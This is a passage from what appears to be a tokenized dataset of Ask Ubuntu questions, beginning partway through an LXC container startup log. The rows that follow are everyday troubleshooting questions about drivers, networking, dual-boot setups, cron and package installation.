'/usr/lib/x86_64-linux-gnu/lxc//dev/pts ' , type 'devpts' lxc-start 1383145786.576 debug lxc_conf - mounted 'none ' on '/usr/lib/x86_64-linux-gnu/lxc//proc ' , type 'proc' lxc-start 1383145786.576 debug lxc_conf - mounted 'none ' on '/usr/lib/x86_64-linux-gnu/lxc//sys ' , type 'sysfs' lxc-start 1383145786.576 debug lxc_conf - mounted 'none ' on '/usr/lib/x86_64-linux-gnu/lxc//run ' , type 'tmpfs' lxc-start 1383145786.576 info lxc_conf - mount points have been setup lxc-start 1383145786.577 info lxc_conf - console has been setup lxc-start 1383145786.577 info lxc_conf - 8 tty ( s ) has been setup lxc-start 1383145786.577 info lxc_conf - rootfs path is ./data/srv/lxc/as1. , mount is ./usr/lib/x86_64-linux-gnu/lxc . lxc-start 1383145786.577 info lxc_apparmor - i am 1 , /proc/self points to 1 lxc-start 1383145786.577 debug lxc_conf - created '/usr/lib/x86_64-linux-gnu/lxc/lxc_putold ' directory lxc-start 1383145786.577 debug lxc_conf - mountpoint for old rootfs is '/usr/lib/x86_64-linux-gnu/lxc/lxc_putold' lxc-start 1383145786.577 debug lxc_conf - pivot_root syscall to '/usr/lib/x86_64-linux-gnu/lxc ' successful lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/dev/pts' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/run/lock' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/run/shm' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/run/user' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/cpuset' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/cpu' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/cpuacct' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/memory' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/devices' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/freezer' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/blkio' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/perf_event' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/hugetlb' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup/systemd' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/fuse/connections' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/kernel/debug' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/kernel/security' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/pstore' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/proc' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/data' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/boot' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/dev' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/run' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys/fs/cgroup' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold/sys' lxc-start 1383145786.577 debug lxc_conf - umounted '/lxc_putold' lxc-start 1383145786.577 info lxc_conf - created new pts instance lxc-start 1383145786.578 debug lxc_conf - drop capability 'sys_boot ' ( 22 ) lxc-start 1383145786.578 debug lxc_conf - capabilities have been setup lxc-start 1383145786.578 notice lxc_conf - 'as1 ' is setup . lxc-start 1383145786.578 debug lxc_cgroup - cgroup 'memory.limit_in_bytes ' set to '20g' lxc-start 1383145786.578 debug lxc_cgroup - cgroup 'cpuset.cpus ' set to '12-23' lxc-start 1383145786.578 info lxc_cgroup - cgroup has been setup lxc-start 1383145786.578 info lxc_apparmor - setting up apparmor lxc-start 1383145786.578 info lxc_apparmor - changed apparmor profile to lxc-container-default lxc-start 1383145786.578 notice lxc_start - exec'ing '/sbin/init' lxc-start 1383145786.578 info lxc_conf - looking at .15 20 0:14 / /sys rw , nosuid , nodev , noexec , relatime - sysfs sysfs rw . lxc-start 1383145786.578 info lxc_conf - now p is . /sys . lxc-start 1383145786.578 info lxc_conf - looking at .16 20 0:3 / /proc rw , nosuid , nodev , noexec , relatime - proc proc rw . lxc-start 1383145786.578 info lxc_conf - now p is . /proc . lxc-start 1383145786.578 info lxc_conf - looking at .17 20 0:5 / /dev rw , relatime - devtmpfs udev rw , size=32961632k , nr_inodes=8240408 , mode=755 . lxc-start 1383145786.578 info lxc_conf - now p is . /dev . lxc-start 1383145786.578 info lxc_conf - looking at .18 17 0:11 / /dev/pts rw , nosuid , noexec , relatime - devpts devpts rw , mode=600 , ptmxmode=000 . lxc-start 1383145786.578 info lxc_conf - now p is . /dev/pts . lxc-start 1383145786.578 info lxc_conf - looking at .19 20 0:15 / /run rw , nosuid , noexec , relatime - tmpfs tmpfs rw , size=6594456k , mode=755 . lxc-start 1383145786.578 info lxc_conf - now p is . /run . lxc-start 1383145786.578 info lxc_conf - looking at .20 1 252:0 / / rw , relatime - ext4 /dev/mapper/limitorderbook1-root rw , errors=remount-ro , data=ordered . lxc-start 1383145786.578 info lxc_conf - now p is . / . lxc-start 1383145786.578 info lxc_conf - looking at .22 15 0:16 / /sys/fs/cgroup rw , relatime - tmpfs none rw , size=4k , mode=755 . lxc-start 1383145786.578 info lxc_conf - now p is . /sys/fs/cgroup . lxc-start 1383145786.578 info lxc_conf - looking at .23 15 0:17 / /sys/fs/fuse/connections rw , relatime - fusectl none rw . lxc-start 1383145786.578 info lxc_conf - now p is . /sys/fs/fuse/connections . lxc-start 1383145786.578 info lxc_conf - looking at .24 15 0:6 / /sys/kernel/debug rw , relatime - debugfs none rw . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/kernel/debug . lxc-start 1383145786.579 info lxc_conf - looking at .25 15 0:10 / /sys/kernel/security rw , relatime - securityfs none rw . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/kernel/security . lxc-start 1383145786.579 info lxc_conf - looking at .26 19 0:18 / /run/lock rw , nosuid , nodev , noexec , relatime - tmpfs none rw , size=5120k . lxc-start 1383145786.579 info lxc_conf - now p is . /run/lock . lxc-start 1383145786.579 info lxc_conf - looking at .27 19 0:19 / /run/shm rw , nosuid , nodev , relatime - tmpfs none rw . lxc-start 1383145786.579 info lxc_conf - now p is . /run/shm . lxc-start 1383145786.579 info lxc_conf - looking at .28 22 0:20 / /sys/fs/cgroup/cpuset rw , relatime - cgroup cgroup rw , cpuset , clone_children . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/cpuset . lxc-start 1383145786.579 info lxc_conf - looking at .29 19 0:21 / /run/user rw , nosuid , nodev , noexec , relatime - tmpfs none rw , size=102400k , mode=755 . lxc-start 1383145786.579 info lxc_conf - now p is . /run/user . lxc-start 1383145786.579 info lxc_conf - looking at .30 15 0:22 / /sys/fs/pstore rw , relatime - pstore none rw . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/pstore . lxc-start 1383145786.579 info lxc_conf - looking at .31 22 0:23 / /sys/fs/cgroup/cpu rw , relatime - cgroup cgroup rw , cpu . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/cpu . lxc-start 1383145786.579 info lxc_conf - looking at .32 22 0:24 / /sys/fs/cgroup/cpuacct rw , relatime - cgroup cgroup rw , cpuacct . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/cpuacct . lxc-start 1383145786.579 info lxc_conf - looking at .33 22 0:25 / /sys/fs/cgroup/memory rw , relatime - cgroup cgroup rw , memory . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/memory . lxc-start 1383145786.579 info lxc_conf - looking at .34 22 0:26 / /sys/fs/cgroup/devices rw , relatime - cgroup cgroup rw , devices . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/devices . lxc-start 1383145786.579 info lxc_conf - looking at .35 22 0:27 / /sys/fs/cgroup/freezer rw , relatime - cgroup cgroup rw , freezer . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/freezer . lxc-start 1383145786.579 info lxc_conf - looking at .36 22 0:28 / /sys/fs/cgroup/blkio rw , relatime - cgroup cgroup rw , blkio . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/blkio . lxc-start 1383145786.579 info lxc_conf - looking at .37 22 0:29 / /sys/fs/cgroup/perf_event rw , relatime - cgroup cgroup rw , perf_event . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/perf_event . lxc-start 1383145786.579 info lxc_conf - looking at .38 22 0:30 / /sys/fs/cgroup/hugetlb rw , relatime - cgroup cgroup rw , hugetlb . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/hugetlb . lxc-start 1383145786.579 info lxc_conf - looking at .39 20 9:2 / /data rw , relatime - ext4 /dev/md2 rw , errors=remount-ro , data=ordered . lxc-start 1383145786.579 info lxc_conf - now p is . /data . lxc-start 1383145786.579 info lxc_conf - looking at .40 20 8:1 / /boot rw , relatime - ext2 /dev/sda1 rw , errors=continue . lxc-start 1383145786.579 info lxc_conf - now p is . /boot . lxc-start 1383145786.579 info lxc_conf - looking at .41 22 0:31 / /sys/fs/cgroup/systemd rw , nosuid , nodev , noexec , relatime - cgroup systemd rw , name=systemd . lxc-start 1383145786.579 info lxc_conf - now p is . /sys/fs/cgroup/systemd . lxc-start 1383145786.579 notice lxc_start - '/sbin/init ' started with pid '6249' lxc-start 1383145786.579 warn lxc_start - invalid pid for sigchld < 4 > init : ureadahead main process ( 7 ) terminated with status 5 < 4 > init : console-font main process ( 94 ) terminated with status 1 and it will just sit there like that for hours at least . the container becomes pingable but i ca n't ssh and if i try lxc-console -n as1 i get a blank screen . if i do lxc-stop -n as1 or ^c in the window where it has hung i get : ^cterm environment variable not set . < 4 > init : plymouth-upstart-bridge main process ( 192 ) terminated with status 1 < 4 > init : hwclock-save main process ( 187 ) terminated with status 70 * asking all remaining processes to terminate ... ... done . * all processes ended within 1 seconds ... ... done . * deactivating swap ... ... fail ! mount : can not mount block device /dev/md2 read-only * will now restart but after 20 minutes it has n't restarted . any ideas why these containers are hanging ?
368558	keyboard status leds not working	running ubuntu 13.10 64bit the status leds are not working correctly on my new keyboard under ubuntu . pressing caps lock and num lock do not cause the leds to turn on/off to reflect their status . rather i have a num lock led stuck on , and a caps lock led that never turns on . the actual function of the caps lock and num lock is unaffected though , just the leds not working . i am able to use ¨setleds¨ to turn the leds on an off from a console session , so i don´t think there 's any hardware problem . also the keyboard does not have the same problem under windows 7 . anyone have any solutions ? thanks ! the keyboard in question is a monoprice mechanical gaming keyboard : http : //www.amazon.co.uk/gp/product/b0081tq83k/ http : //www.monoprice.com/product ? c_id=114 & cp_id=11401 & cs_id=1140102 & p_id=9181 & seq=1 & format=2 which itself seems to be an own branded qpad mk-85
368560	what is the structure of network managers system-connections files ?	could anyone list the complete structure of the configuration files , which network manager stores for known networks in /etc/networkmanager/system-connections for known networks ? sample ( filename askubuntu ) : [ connection ] id=askubuntu uuid=81255b2e-bdf1-4bdb-b6f5-b94ef16550cd type=802-11-wireless [ 802-11-wireless ] ssid=askubuntu mode=infrastructure mac-address=00:08 : ca : e6:76 : d8 [ ipv6 ] method=auto [ ipv4 ] method=auto i would like to create some of them by my own using a script . however , before doing so i would like to know every possible option . furthermore , this structure seems somehow to resemble the information you can get using the dbus for active connections . dbus-send -- system -- print-reply \ -- dest=org.freedesktop.networkmanager \ `` $ active_setting_path '' \ # /org/freedesktop/networkmanager/settings/2 org.freedesktop.networkmanager.settings.connection.getsettings will tell you : array [ dict entry ( string `` 802-11-wireless '' array [ dict entry ( string `` ssid '' variant array of bytes `` askubuntu '' ) dict entry ( string `` mode '' variant string `` infrastructure '' ) dict entry ( string `` mac-address '' variant array of bytes [ 00 08 ca e6 76 d8 ] ) dict entry ( string `` seen-bssids '' variant array [ string `` 02:1a:11 : f8 : c5:64 '' string `` 02:1a:11 : fd:1f : ea '' ] ) ] ) dict entry ( string `` connection '' array [ dict entry ( string `` id '' variant string `` askubuntu '' ) dict entry ( string `` uuid '' variant string `` 81255b2e-bdf1-4bdb-b6f5-b94ef16550cd '' ) dict entry ( string `` timestamp '' variant uint64 1383146668 ) dict entry ( string `` type '' variant string `` 802-11-wireless '' ) ] ) dict entry ( string `` ipv4 '' array [ dict entry ( string `` addresses '' variant array [ ] ) dict entry ( string `` dns '' variant array [ ] ) dict entry ( string `` method '' variant string `` auto '' ) dict entry ( string `` routes '' variant array [ ] ) ] ) dict entry ( string `` ipv6 '' array [ dict entry ( string `` addresses '' variant array [ ] ) dict entry ( string `` dns '' variant array [ ] ) dict entry ( string `` method '' variant string `` auto '' ) dict entry ( string `` routes '' variant array [ ] ) ] ) ] i can create new setting files using the dbus ( addsettings ( ) in /org/freedesktop/networkmanager/settings ) passing this type of input , so explaining me this structure and telling me all possible options will also help . afaik , this is a dictionary { string , dictionary { string , variant } } . will there be any difference creating config files directly or using the dbus ?
368567	getting rid of hidden ubuntu files after uninstalling ubuntu ? [ solved ]	just earlier on today , i have uninstalled ubuntu as i did n't like it that much , so i uninstalled it . back on windows , i check my hard drive and it seems as there is about 5gb taken from something , i believe that uninstalling ubuntu did n't get rid of all the files since the uninstaller was finished in about 2 seconds . is there a manual way to get rid of those files or some alternative way ? thanks !
368571	ubuntu and windows 8	do you have a version of ubuntu that works with windows 8 ? ubuntu 12.04.3 and 13.10 can not detect windows 8 on my hard drive and want to erase everything .
368572	how to install ruby ?	i am pretty new to ruby world and i do n't know about installing it . viewing methods from blogs with google search but feeling confuse . could somebody help me to setup ruby in my ubuntu 13.10 ?
368573	problem install package in ubuntu server running in virtualbox	i install ubuntu server 12.04 in virtualbox and i have internet connection when i ping google.com but when i want to install some package like kubuntu-desktop or dhcp3-server , terminal say : unable to locate package `` package_name '' . my commands looks like : sudo apt-get install dhcp3-server sudo apt-get install kubuntu-desktop can anybody help me how can i fix it ?
368576	rt3290 wireless stops working randomly until reboot .	my wifi stops working randomly till i reboot my laptop . i dont know if this helps : lspci -nn | grep 0280 04:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ]
368577	ubuntu 13.10 no top right bar buttons ( power , network , calender )	the top right corner of the screen which previously housed the power , network , calender indicators are nowhere to be seen now . i had an upgrade yesterday from 13.04 and can not find them anywhere . i have also installed ubuntu tweak . but can not find indicator option anywhere . i am pretty new to ubuntu . some help please .
368579	pynag package not showing up in apt-get ?	i need to install pynag , following the readme : http : //code.google.com/p/pynag/source/browse/readme.md it says to use apt-get . but it does n't appear it found any packages ? sudo apt-get install python-pynag pynag reading package lists ... done building dependency tree reading state information ... done e : unable to locate package python-pynag e : unable to locate package pynag i 'm running ubuntu 12.04.3 lts .
368580	mounting a drive using sshfs	i am trying mount a remote drive using sshfs on ubuntu 12.04 . i follow the steps here : http : //xmodulo.com/2013/04/how-to-mount-remote-directory-over-ssh-on-linux.html but after i did sshfs successfully , i did ls , i get : ls : can not access sshdrive : permission denied total 8 drwxr-xr-x 4 root root 4096 oct 30 09:10 ./ drwxr-xr-x 26 root root 4096 apr 23 2013 ../ d ? ? ? ? ? ? ? ? ? ? ? ? ? ? sshdrive/ how can i fix my problem ?
368582	i 'm unable to install software manually downloaded from internet	i 'm unable to install software/programs downloaded from the internet . i able to download wanted apps but do n't know how to install them . my ubuntu software center works perfectly . i usually look for a setup icon or unpack icon after download , i extract the files but ca n't get around installing the program . i have tried to install 7zip but it is not installing , and i need to download oracle java for minecraft and other applications . i 'm use to windows automatically starting setup upon download and cant figure out how to initiate the install in ubuntu . i 'm running ubuntu 13.10 , and i need help with mentioned problem .
368585	ubuntu 13.10 and bios	is it possible to install ubuntu 13.10 with bios v02.58 on my desktop ? i am having problems . the ubuntu 13.10 works on the dvd drive . however , i am unable to install ubuntu 13.10 on either one of my two hard drives . thank you .
368588	connman 0.79 loses wifi ( indicator network )	i am pretty new to ubuntu linux and this is my first time on here . i am running indicator network with connman 0.79 under ubuntu 12.04 and wpa_supplicant v0.7.3 . when i try to connect to wireless network it all sound fine and getting connected with no problems at all . after a while it just lose connection and will never come back . when i search for available services it shows that the network still connected and ready to use . thanks
368590	chromium has no window buttons when not-maximized	i have chromium on my ubuntu 13.04 system and for some odd reason it does n't seem to be working nicely with my installation . i already posted a question ( problem importing firefox bookmarks to chromium ) that has yet to be answered and now this is occuring ! when i click the maximize button when the window is currently maximized or double-click on the blue bar it un-maximizes and everything still works fine , except for the fact that i have no ability to resize the window and all of the window control buttons ( close , minimize , maximize ) are gone ! intermittently the buttons remain in the the top menu bar and those still work ( and sometimes it just says the window title ) , but nothing is on the actual un-maximized window and i ca n't resize the window , something crucial for web developing to make sure my web page works at different sizes . if i could get help on this that would be great and if i could solve both of my problems that would be awesome ! thanks !
368592	avidemux crashes	for few weeks i have a problem with some movies i want to edit in avidemux . when i try to open them , there is information i should safe mode ( otherwise i 'll lose the accuracy of frames ) , then program inform me abut crash : assert failed : rewind at line 247 , file /build/buildd/avidemux-2.5.4/avidemux/adm_editor/adm_edrender.cppadm_backtrack adm_composer : :getuncompressedframe ( unsigned int , admimage* , unsigned int* ) admpreview : :update ( unsigned int ) avidemux2_qt4 ( ) [ 0x809a5d5 ] a_openavi2 ( char const* , unsigned char ) a_openavi ( char const* ) adm_qt4_filesel : :gui_fileselread ( char const* , void ( * ) ( char const* ) ) gui_fileselread ( char const* , void ( * ) ( char const* ) ) handleaction ( action ) mainwindow : :buttonpressed ( ) avidemux2_qt4 ( ) [ 0x8198c48 ] qmetaobject : :activate ( qobject* , qmetaobject const* , int , void** ) qaction : :triggered ( bool ) qaction : :activate ( qaction : :actionevent ) i can not also install later version of avidemux tan 2.5.4 . does anyone know what should i do to fix it ?
368593	ca n't access from ubuntu to windows 8 drives that install along side it	i installed ubuntu 13.04 alongside windows 8 but when i want to access windows drives i see this error massage : error mounting /dev/sda1 at /media/xalid/3a56a42656a3e0bd : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/xalid/3a56a42656a3e0bd '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . as a workaround i tried this : mkdir /media/sd4 mount -t ntfs-3g -o ro /dev/sda1 /media/sd4 this allows me to access the partition , but i am unable to change anything on the drive since it was mounted as read only . how can i access to my windows drives whenever i login to ubuntu ?
368595	dualboot installation on asus eee 1215b grub placed in usb	i have previously updated my asus eee pc seashell 1215b from win 7 to win 8 and later win8.1 yesterday i decided to install ubuntu 13.10 on my lappy , and had some small problems installing cause the efi boot . but it came around , and ubuntu got installed and grub finds both os'es - w8.1 and ubuntu . i set the system up to my preferences and so on , removing the usb flash drive i used to install ubuntu with , and restarted the computer . but it wo n't boot . i have to have the usb flash drive in the slot to get the computer to boot . my question is , how do i get the computer to work without the flash drive ? i dont mind reinstalling ubuntu . win partition does n't boot either . pleease help me !
368598	i ca n't install nvidia correctly	i tried to install the nvidia drivers in my laptop dell inspiron i7 with graphyc g-force running with ubuntu 13.10 . i tried this commands : apt-get install nvidia-current-updates - nvidia-xconfig but it all ways returns me to the black screen . please how do i install the nvidia drivers correctly without failure ( i have tried many times but they are still not working )
368599	problem with letter `` t '' and unity	my unity is showing some weird characters when i type the letter `` t '' on it . ( image below ) any clue ? thanks in advance -- ubuntu 13.10 x64 w/ unity amd fglrx 13.11beta
368606	launchpad : missing build dependencies even though dependency should be contained in uploaded package	i want to backport gcc-4.7 from raring to precise . so i ran backportpackage and uploaded gcc-4.7 to my ppa . however , when launchpad tries to build it it complains about a missing dependency : dependency wait on rhenium ( virtual64 ) missing build dependencies : libx32gcc1 started on 2013-10-24 finished on 2013-10-24 ( took 2 minutes , 46.6 seconds ) from looking at the package info for gcc-4.7 it seems that this should also be contained in the gcc-4.7 package that has been backported . what do i need to do to make launchpad find this and build my package ?
368611	is there a way to make ubuntu read out notifications ?	ubuntu has a very cool notification system . is there a way to make ubuntu read out notifications when they appear ? or is it possible to link the text in notifications to espeak ?
368612	how to implement a text based quiz using bash ?	is there a decent way of implementing a quiz in bash , where the questions are randomised each time and where the users ' different responses ( correct , wrong , pass ) are recorded and then given at the end of the quiz ? i suppose arrays could be used to store the quiz questions and answers , and the quiz questions themselves could be asked within a while or until loop , and the various questions could be incremented until the last one was reached , then the user 's performance could be assessed by using various conditional statements ? please note that this old question discussed graphical quiz software and explictly mentioned sound/graphics , etc , while i am talking about only a command-line text-based quiz . ( i have answered my own question below ... but if anyone has another framework for a quiz in bash , please post . )
368614	problems after upgrading to 13.10	my laptop has 4gb of ram and has seen ubuntu installations since 12.04 . i use 64bit version of ubuntu . i use my laptop for work and has oracle jdk and eclipse installed - same setup since 12.04 and never had any problems . both jdk and eclipse are installed in my home directory . until last sunday when i upgraded to 13.10 , i was able to use eclipse and java without any problems . after upgrading to 13.10 , eclipse is not working correctly . eclipse is not able to handle my workspace and 15 odd maven projects that gets loaded when i load the workspace . jvm suddenly terminates and i see eclipse screen saying jvm terminated . i get standard box saying ubuntu encountered problem , do you want to report it . if i choose yes , i get another error saying that your computer does not have enough memory to report the problem . command line build using maven are working ok - able to compile all files without any problems . i have tried starting with clean eclipse workspace assuming that my workspace was corrupted . i have also tried importing only one project with no luck . any ideas what can be wrong with eclipse ? why ubuntu can not report the problem ?
368615	how to trigger apt-action if program is updated/upgraded ?	question : i want to do some things if a few special programs are updated/upgraded , that is to say when their executable and/or config files get changed/overwritten . specifically , i want to automatically execute sed -i 's/geteuid/getppid/g ' `which vlc` each time vlc has been updated/upgraded and i want to replace exec -a `` $ 0 '' `` $ here/chrome '' `` $ @ '' with exec -a `` $ 0 '' `` $ here/chrome '' `` $ @ '' -- user-data-dir=/root/.config/google-chrome in /usr/bin/google-chrome each time google-chrome is updated/upgraded .
368617	cron job not running after proper setup	so i created a cron job as shown below : gnu nano 2.2.6 file : /tmp/crontab.unoexy/crontab # edit this file to introduce tasks to be run by cron . # # each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # to define the time you can provide concrete values for # minute ( m ) , hour ( h ) , day of month ( dom ) , month ( mon ) , # and day of week ( dow ) or use '* ' in these fields ( for 'any ' ) . # # notice that tasks will be started based on the cron 's system # daemon 's notion of time and timezones . # # output of the crontab jobs ( including errors ) is sent through # email to the user the crontab file belongs to ( unless redirected ) . # # for example , you can run a backup of all your user accounts # at 5 a.m every week with : # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ # # for more information see the manual pages of crontab ( 5 ) and cron ( 8 ) # # m h dom mon dow command */3 * * * * /home/kyle/runbackup.sh which , for a test - runs the script as indicated every three minutes . yes checking the var/log/syslog - there is no cron run for today . evidence of this cron running is a .tar.gz file in my dropbox folder - which , if you run the script your self , happens . its only putting it into a cron that nothing happens .
368619	make snap shot script	i am attempting to write a script take a snapshot of a given logical volume and delete any older than rotate_count . the makesnap tool takes a snapshot of the given logicalvol . the snapshot’s name is logicalvolsnapyymmdd ( e.g . logicalvolsnap20131027 ) . it writes a log to /var/log/messages ( facility “daemon” , priority “notice” ) which says : “snapshot of logicalvol taken.” if there are more than rotatecount snaps with the name logicalvolyymmdd , the oldest is deleted . if there is not enough room to make the snap , a log message ( facility daemon , priority error ) is generated : “not enough space to make snap logicalvolsnapyymmdd” , and 1 is returned . any assistance is greatly appreciated .
368620	tried installing uniconvertor from sk1 and it removed all computer functionality	i tried updating from some files over on the sk1 project website , and it has crashed my computer . i am unable to shut down , restart or suspend , as there is no longer any side bar or bar along the top anymore . i am unable to open up terminals - either by using the hot keys or clicking on the icon . gives an error . same with txt files , they all try to open with libre office . i am not sure how to fix the issue . i have no time , battery or main menu options either . the file i tried updating was python-uniconvertor-2.0-rev362_0ubuntu1_13.04_i386.deb i am not sure how to fix this issue , as i am not the one who installed this system and he is no longer around . any thoughts on this ?
368621	xgi volari video card not working for ubuntu on xp machine	i 've got an old self-built pc running windows xp professional . no onboard video card , using one that works pretty well in xp but not at all for ubuntu . wo n't boot into ubuntu . stops without getting past the splash screen except for error messages . have not run an install per se , wanting to see it run from the dvd before installing , so i can at least see what 's happening . i do get the splash screen for ubuntu 13.10 then it goes black ( well , purple ) and gives an error code ; i could n't get it all down because some of it goes off screen : [ 110.010390 ] sis630 smbu 0000:00 ... .. the card is an xgi volari-v3/xgi volare-xp5 v. 1.13 bios info : ax7.4 ( 40.00 ) 04 dac type : integrated ramdac driver date : 10+18+05 driver version 6.14.1.1130 i 've tried earlier version of ubuntu with the same result : not successful . i think i tried it with linspire 5.0 several years ago but for some reason did n't stay with it . would prefer to keep this video card as i get this old box away from xp if possible , but apparently i do n't know how to make that happen . ca n't get to a command line before it crashes or locks up or whatever . unless i boot it in xp of course , but then i do n't think xp would respond to `` sudo apt-get . '' ; ) this is not my only machine but i do like it and it has some features that my new machines do n't have , such as midi ports , etc . that can be pretty important for a musician . help ? thanks in advance . trent
368622	problem with 13.04 migration to 13.10	system hung while attempting to update from 13.04 to 13.10 . when i attempt to reboot i receive the following message : # filesystem check or mount failure . # a maintenance shell will now be started . # control-d will terminate this shell and continue booting after re-trying filesystem . any further errors will be ignored . # give root password for maintenance ( or type control-d to continue : note : nothing happens when i try to type my password . it just hangs . prior to this i was using 13.04 without any problems .
368623	can i downlaod ububtu onto a disk	i just need to download ubuntu onto a disk . how do i do it ? i ca n't seem to figure it out . i feel funny asking but i need help . thanks !
368624	runing ubuntu in oracle virtual box	i had to download ubuntu for a class and my professor said that it would be fine if i loaded it into my existing virtual box . its downloaded and everything , the only thing is i do n't recall making a passphrase and it asks for one when i am trying to run it . could i get some assistance on this , please ?
368629	unable to boot/mount ubuntu ?	so , i am trying to install ubuntu version 12.04 lts on an acer aspire series 5742z running windows 7 home premium . to accomplish this , i carried out the following steps : i went into the windows partition settings , and shrank the ( c : ) volume ( type ntfs ) in order to create a new partition of 127.96gb ( l : - also type ntfs ) on which i would install the linux software with 156.03gb remaining on the c : drive to keep windows on a separate partition . after this , i downloaded ubuntu using the windows installer version ( http : //www.ubuntu.com/download/desktop/windows-installer ) , while specifying the l : drive and size for installation . now , when i boot up the laptop , i am given the choice between windows 7 and ubuntu ( as one would expect ) . however , when i select ubuntu , the following error message flashes : hd ( 0.0 ) : ntfs5 : no wubuildr hd ( 0.1 ) : ntfs5 : no wubuildr hd ( 0.2 ) : ntfs5 : error : “prefix” is not set after this , a purple interface will appear stating “preparing ubuntu for first time use” . however , i then get the message “an error occured while mounting” . please note that while i am currently trying a desktop installation , i have tried to mount ubuntu from a usb stick as well prior to this method , and that has brought no joy either . any ideas ? i really want to switch over due to my increasing dissatisfaction ( to put it mildly ) with windows . any help or expertise would be greatly appreciated ; should you require any further information i’ll gladly pass it on ! also , please note that i am quite new to coding , programming etc so if there are complex steps required i’d be grateful if you could please explain it in layman terms . many thanks !
368632	does tlp dynamically change according to power source ?	i know that tlp automatically starts when the system boots up , but i wonder if it dynamically changes according power source . for example , when i manually type sudo tlp start when i 'm running my laptop on battery power it responds with a `` tlp started in battery mode . '' and when i plug in the charger it says `` tlp started in ac mode . '' is tlp able to do that on its own or do i have to manually change it each time i change power source ?
368635	ubuntu touch desktop mode on nexus 10	does the current available version of ubuntu touch for nexus 10 support the desktop mode ( showing the full desktop on an external monitor ) ? if yes , how can i activate it ? plug in hdmi montior and usb keyboard ? does it have to be triggered separately ?
368636	upgrade to 13.10 stalled and restart failed	i had 13.04 before . in response to a popup to upgrade to 13.10 , i clicked yes , and the whole thing went on autopilot overnight . woke up this morning , and it 's stuck at `` unpacking x.org '' . i forced the machine to restart , but failed . many had this problem and the suggestion is to execute : sudo dpkg 窶田onfigure -a but this did not work for me . the error was something like some file missing .
368640	after formatting and reinstalling trash is full	so i formatted hard and reinstalled 13.04 but the trash was full . i mean it kept all the files i deleted on previous system ( same 13.04 ) . is it normal ?
368644	what is the easiest way to mount a network drive from an ubuntu 12.04 server ?	i have a pc running ubuntu 12.10 . i want to share or map storage ( 2tb hard-disks ) from that machine to a ubuntu server 12.04 . 12.10 ( pc ) -- -- -- -- -- - > 12.04 ( server ) how can i achieve that ?
368646	mesa 10.0 for ubuntu 13.10	as i read articles on phoronix , i can see that they test hardware with mesa 10.0 driver . i can can however only find mesa 9.2.2 release . i have ubuntu 13.10 with 3.12 kernel , mesa 9.2.1 driver and radeon 4570 on my machine . dpm is enabled and i am seeking new ways to improve performance . is there any convinient way to update my drivers ? preferably via repository . p.s . i 've also checked https : //launchpad.net/~oibaf/+archive/graphics-drivers/ that repo , there are 10.0 drivers in there , but the repo keeps installing outdated ones .
368647	xpad sticky notes on ubuntu 13.10	i just installed xpad on ubuntu 13.10 , and i can only see the last sticky note saved . where can i found all the rest i saved ? thanks
368648	can not view files and folders of windows drive from wubi	i do not know what has gone wrong with my d : drive . the drive is absolutely fine , data is present . i can unmount/mount the drive ; but can not view files and folders in it . when i try to ls the drive from the terminal i get the following error : ls : can not access found.001 : input/output error this was working fine till 2 days back , but it seems i have deleted some file . can someone please help figure out how can i view them again ? wubi is installed in the e : drive .
